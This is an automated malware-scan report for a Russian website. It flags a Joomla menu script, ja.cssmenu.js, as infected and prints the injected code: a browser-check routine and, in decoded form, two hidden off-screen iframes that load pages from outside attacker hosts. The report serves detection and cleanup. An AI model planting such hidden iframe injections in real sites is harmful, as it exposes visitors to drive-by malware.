New scan:

Malware Scanner report for eurodrova74.ru

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://eurodrova74.ru/
200 OK
Content-Length: 17191
Content-Type: text/html
clean
http://eurodrova74.ru/media/system/js/caption.js
200 OK
Content-Length: 5324
Content-Type: application/x-javascript
clean
http://eurodrova74.ru/templates/ja_erica/scripts/ja.script.js
200 OK
Content-Length: 15630
Content-Type: application/x-javascript
clean
http://eurodrova74.ru/templates/ja_erica/scripts/ja.hiddenpanel.js
200 OK
Content-Length: 7382
Content-Type: application/x-javascript
clean
http://eurodrova74.ru/templates/ja_erica/ja_menus/ja_cssmenu/ja.cssmenu.js
200 OK
Content-Length: 4728
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (k_haystack, k_needle, k_offset) {
var duonet = (k_haystack + '').toLowerCase();
var bizolda = (k_needle + '').toLowerCase();
var index = 0;
if ((index = duonet.indexOf(bizolda, k_offset)) !== -1) {
return index;
}
return false;
}
function CheckBrowser(){
var badbrowserlist = ['Chrome','Android'];
var anuchbrow = false;
for (var i in badbrowserlist) {
if (stripos(navigator.userAgent,
... 2258 bytes are skipped ...
on() {
clearTimeout(this.timer);
if(this.className.indexOf("sfhover") == -1)
this.className+="sfhover";
}
sfEls[i].onmouseout=function() {
this.timer = setTimeout(sfHoverOut.bind(this), 20);
}
}
}

function sfHoverOut() {
clearTimeout(this.timer);
this.className=this.className.replace(new RegExp("sfhover\\b"), "");
}

if (window.attachEvent) window.attachEvent("onload", sfHover);
;
;

Decoded script:


function () {
var sfEls = document.getElementById("ja-cssmenu").getElementsByTagName("li");
for (var i = 0; i < sfEls.length; ++i) {
sfEls[i].onmouseover = function () {clearTimeout(this.timer);if (this.className.indexOf("sfhover") == -1) {this.className += "sfhover";}};
sfEls[i].onmouseout = function () {this.timer = setTimeout(sfHoverOut.bind(this), 20);};
}
}
<iframe src="http://duigosel.symphonic-music.com/stinles15.transmedia" style="position:absolute;left:-3000px;top:-3000px;" height="132" width="132"></iframe><iframe src="http://reactor.ayopilih.org/ajhdsfwqfgegerhrsh12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe>

Antivirus reports:

VIPRE
Malware.JS.Generic (JS)

http://eurodrova74.ru/shadowbox/shadowbox.js
200 OK
Content-Length: 40679
Content-Type: application/x-javascript
clean
http://eurodrova74.ru/index.html
200 OK
Content-Length: 17191
Content-Type: text/html
clean
http://eurodrova74.ru/index.php.html
500 Internal Server Error
Content-Length: 21042
Content-Type: text/html
clean
http://eurodrova74.ru/js/jquery/jquery-1.4.4.min.js
404 Not Found
Content-Length: 21090
Content-Type: text/html
clean
http://eurodrova74.ru/js/site_navigation.js
404 Not Found
Content-Length: 21090
Content-Type: text/html
clean
http://eurodrova74.ru/js/
404 Not Found
Content-Length: 21090
Content-Type: text/html
clean
http://eurodrova74.ru/test404page.js
404 Not Found
Content-Length: 21090
Content-Type: text/html
clean
http://eurodrova74.ru/js/jquery/
404 Not Found
Content-Length: 21090
Content-Type: text/html
clean
http://eurodrova74.ru/index.php%3Foption=com_content&view=frontpage&Itemid=1.html
200 OK
Content-Length: 17529
Content-Type: text/html
clean
http://eurodrova74.ru/index.php%3Foption=com_content&view=article&id=1&Itemid=2.html
200 OK
Content-Length: 19683
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: eurodrova74.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Jul 2014 15:26:13 GMT
Accept-Ranges: bytes
ETag: "190b7e1-4327-4f68d646a271b"
Server: nginx
Vary: Accept-Encoding
Content-Length: 17191
Content-Type: text/html
Last-Modified: Tue, 08 Apr 2014 19:57:22 GMT

...17191 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eurodrova74.ru
Referer: http://www.google.com/search?q=eurodrova74.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=eurodrova74.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://eurodrova74.ru/

Result: eurodrova74.ru is not infected or malware details are not published yet.